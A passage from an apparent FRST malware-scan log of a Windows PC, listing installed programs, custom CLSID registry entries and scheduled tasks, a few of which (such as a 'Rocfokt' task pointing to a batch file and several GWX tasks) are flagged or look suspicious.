BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 11.0 - Emsisoft Ltd.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {102A620C-F30C-4549-9641-182161BCECEB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1BAAE6FE-C34D-4631-9BB2-16D444231725} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {323B5AD8-0CF3-498F-B85C-6889DE79CF89} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {431A8418-553F-414C-B938-84B7D6C11432} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {564B49C2-B6F5-4F1E-97F5-C10111DA8EE4} - \{99331EF5-343D-47FD-B006-40F37A0D5E9D} -> No File <==== ATTENTION
Task: {5AE1ACA2-BEE0-4554-BD58-6D5A059FC8AD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {5AF597F4-43A4-4292-9389-1D19188D828F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5B6A393D-57E5-4198-BD7E-00E0B9EF3F77} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5BD1D165-089F-40BA-8D52-B90C85B1BB0D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
